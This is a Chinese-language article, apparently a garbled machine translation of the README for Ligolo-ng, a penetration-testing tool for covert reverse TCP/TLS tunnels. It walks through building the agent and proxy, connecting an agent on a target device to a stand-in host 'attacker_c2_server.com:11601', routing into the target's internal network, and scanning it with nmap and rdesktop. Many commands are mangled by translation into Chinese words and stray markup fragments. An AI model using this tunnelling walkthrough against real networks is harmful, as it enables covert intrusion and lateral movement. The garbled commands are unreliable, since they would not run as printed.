[网络安全]渗透测试人员不需要SOCKS支持即可建立隐蔽的通信通道

关于 Ligolo-ng

Ligolo-ng 是一款高级通道工具，基于 TUN 接口实现功能。 Ligolo-ng 是一款轻量级快速工具，可帮助渗透测试人员在不支持 SOCKS 的情况下使用反向 TCP/TLS 连接建立隐蔽通信通道。

功能介绍

Tun接口（不再需要SOCKS）；

简洁的UI界面，支持代理和网络信息选择。

易于使用且易于安装。

基于“让”。用于加密的自动证书配置；

高性能（多路复用）；

无需高级权限；

套接字侦听/代理绑定；

多平台代理支持；

构建工具

构建 Ligolo-ng

$ go build -oagent cmd/agent /main.go$ go build -o proxy cmd/代理/main。转到# 对于Windows代理构建$ GOOS =windows gobuild -o 代理.exe cmd/代理/main.go

安装 Ligolo-ng
必须在命令和控制服务器上启用代理服务，并且必须默认使用端口 11601 进行侦听。

$ sudo ip tuntap 添加用户 [your_username ] 模式 tun ligolo$ sudo ip link set ligolo up$ ./代理-h # 帮助选项$ ./代理-autocert # Au手动请求LetsEncrypt证书

如何使用该工具

首先需要在目标设备上启动代理（无需特殊权限）。

 $ ./ 代理[ k4]连接到attacker_c2_server。  com:11601 

此时，会话该链接将出现在代理服务器上：

INFO [0102] 代理已加入。 name= nchatelain@nworkstation 远程="XX.XX.XX.XX:38000"

使用“会话”命令选择代理：

 ligolo-ng » session? 指定会话 ： 1 - nchatelain@nworkstation  - XX.XX.XX. span> span>XX:38000

使用“”。 ifconfig”命令显示代理的网络配置信息。

[Agent ： nchatelain@nworkstation] » ifconfig[...]┌──────── ────── ────────────────┐│ 接口 3 │ §──────────┬────── ──────── ─┤│ 名称 │ wlp3s0 │ 硬件 MAC │ de:ad:be:ef:ca:fe ││ MTU │  1500 │ │ 旗帜 │上行|广播|组播 ││ IPv4 地址 │ 192.168 .0.30/24 │└────────┴──────────── ──┘

192.168 在代理/中继服务器上 添加路由到.0.0/24 代理网络。

$ sudo ip 路由添加 192.168.0 .0/24 dev ligolo

最后，打开一个通信通道。 在代理上：

[代理 : nchatelain@nworkstation] » 开始[代理: nchatelain@nworkstation] » 信息[0690] 启动一条到 nchatelain@nworkstation 的隧道 

现在代理您将能够通过服务器192.168.0.0/24访问代理网络：

$ nmap  192.168 .0.0/  24 -v -sV -n[。 ..]$ rdesktop 192.168.0.123[...]

支持的协议/数据包

TCP

UDP

ICMP

性能

使用 Ligolo-ng，您可以轻松达到 100 Mbits/s 的速度。 下面的测试结果是在 200Mbits/s 服务器上使用 iperf 测试的 200Mbits/s 链路。

$ iperf3 -c 10.10.0.1 -p 24483连接到主机 10.10.0.1,  span> 端口 24483[ 5] 本地 10.10.0 。 224 端口 50654 连接到 10.10.0.1 端口 24483[ ID] 间隔 传输比特率 Retr Cwnd[  5 ] 0.00- 1.00 秒 12.5 兆字节 105 兆位/ 秒 0 164 千字节 [  5] 1.00-2.00 秒 12.7 兆字节 107 兆位 / span >秒 0 263 千字节 [ 5] 2.00[ k4] 3.00 秒 12.4 兆字节 104 兆位 / 秒 0263 千字节 [ 5] 3.00-4.00 秒 12.7 兆字节 106 兆位 / 秒 0 263 千字节 [ 5 ] 4.00-5.00 秒 13.1 MBytes 110 Mbits/秒 2 134KBytes [ 5 ]  5.00-6.00 秒13.4 兆字节 113 兆位 / 秒 0 147 千字节 [ 55] 6.00-7.00 秒 12.6  MBytes 105 Mbits/秒 0 158 千字节 [ 5 ]  7.00-8.00 秒 12.1 MBytes 101 Mbits/秒 0 173 千字节[ 5] 8.00-9.00 秒 12.7 MBytes 106 Mbits/秒 0 182 KB [ 5] span> 9.00-10.00 秒 12.6 MBytes 106 M位 / 秒 0 188 千字节 - - - - - -  - - - [k4 ] - - - - - - - - - - - - - - -[ ID] 间隔传输比特率 Retr[ 5 ] 0.00-10.00 秒 127 MBytes 106 兆位/ 秒 2 发送者[ 5] 0.00-10.08 秒 125 MBytes 104兆位/秒接收者

注意

自代理不存在，它无法转发原始数据包，因为它以提升的权限运行，在代理上执行 TCP connect()。

使用Nmap时，必须使用“--unprivileged”或“-PE”以避免误报。

工具使用演示

视频地址：【点此观看】

【网络安全学习指南 ]